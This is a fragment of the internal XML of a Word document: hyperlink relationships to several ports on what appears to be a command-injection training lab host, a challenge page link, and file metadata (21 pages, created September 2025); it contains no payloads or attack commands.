    <w:rsid w:val="00CF464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theme" Target="theme/theme1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3003/"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cmdi.cyberjutsu-lab.tech:3007/"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hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3001/" TargetMode="Externa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hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3006/"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hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3005/"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hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3004/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpt.cyberjutsu.io/challenge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hyperlink" Target="http://cmdi.cyberjutsu-lab.tech:3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1944</TotalTime>
  <Pages>21</Pages>
  <Words>2736</Words>
  <Characters>15599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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-10T03:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-11T15:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>